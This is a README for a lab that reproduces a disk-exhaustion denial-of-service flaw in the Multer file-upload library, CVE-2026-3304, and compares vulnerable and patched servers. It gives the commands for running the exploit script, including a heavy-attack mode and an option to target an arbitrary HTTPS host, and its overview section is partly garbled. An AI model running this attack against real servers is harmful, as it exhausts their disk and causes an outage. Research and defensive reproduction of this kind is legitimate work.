Share
## https://sploitus.com/exploit?id=151B00EF-3F80-5046-B2FC-6BD7549AD17E
# CVE-2026-3304 Lab Environment

> **This repository is a vulnerability analysis and reproduction test environment built with AI (Claude).**
> For educational and research purposes only. Attacking systems without authorization is illegal.

## Vulnerability Overview

| Field | Details |
|-------|---------|
| CVE | CVE-2026-3304 |
| Target | Multer |
  |   [Part 1: name="file"  OK]        |-- creates /tmp/uploads/abc123 (temp file)
  |   [Part 2: name missing]           |
  |                                    |-- async fileFilter invoked (setImmediate)
  |                                    |-- missing name -> returns 500 error
  | disk exhaustion (DoS)
```

**Root cause in `lib/make-middleware.js`** โ€” code added by the fix (2.1.0):

```javascript
if (errorOccured) {
  appender.removePlaceholder(placeholder)
  return fileStream.resume()  // clean up temp file
}
```

The async `fileFilter` using `setImmediate` defers execution, so by the time the error is detected the file stream has already been opened and the cleanup branch is never reached in vulnerable versions.

## Setup

### Requirements

- Docker, Docker Compose
- Python 3 + requests (`pip install requests`)

### Start

```bash
# Start vulnerable (port 3000) + patched (port 3001) servers
docker compose up -d --build

# Verify both are running
curl http://localhost:3000/status
curl http://localhost:3001/status
```

## Usage

### Step 1 โ€” Single malformed request (quick test)

```bash
bash exploit/curl_poc.sh
```

### Step 2 โ€” DoS exploit

```bash
# Default (50 requests)
python3 exploit/exploit.py

# Heavy attack (500 requests, 5 KB payload each)
python3 exploit/exploit.py --count 500 --size 5120

# Against HTTPS target with self-signed cert
python3 exploit/exploit.py --target https://target.example.com --no-verify

# Compare against patched version
python3 exploit/exploit.py --target http://localhost:3001 --count 50
```

### Step 3 โ€” Real-time monitoring (separate terminal)

```bash
bash exploit/monitor.sh
```

### Step 4 โ€” Reset upload directory

```bash
curl -X DELETE http://localhost:3000/reset
```

## Expected Results

| Target | Result |
|--------|--------|
| Vulnerable server (3000) | Orphaned file created per request, disk grows continuously |
| Patched server (3001) | 0 orphaned files regardless of request count |

## Verified Test Results

Two runs without reset โ€” files accumulate and are never cleaned up:

```
Run 1: orphaned files  0  ->  50  (100 KB wasted)
Run 2: orphaned files 50  -> 100  (200 KB wasted)
```

Patched version (2.1.0): 0 orphaned files after 100 identical requests.

## References

- [GitHub Advisory GHSA-xf7r-hgr6-v32p](https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)
- [Fix commit 739919097d](https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee)
- [NVD CVE-2026-3304](https://vulners.com/cve/CVE-2026-3304)

## Teardown

```bash
docker compose down
```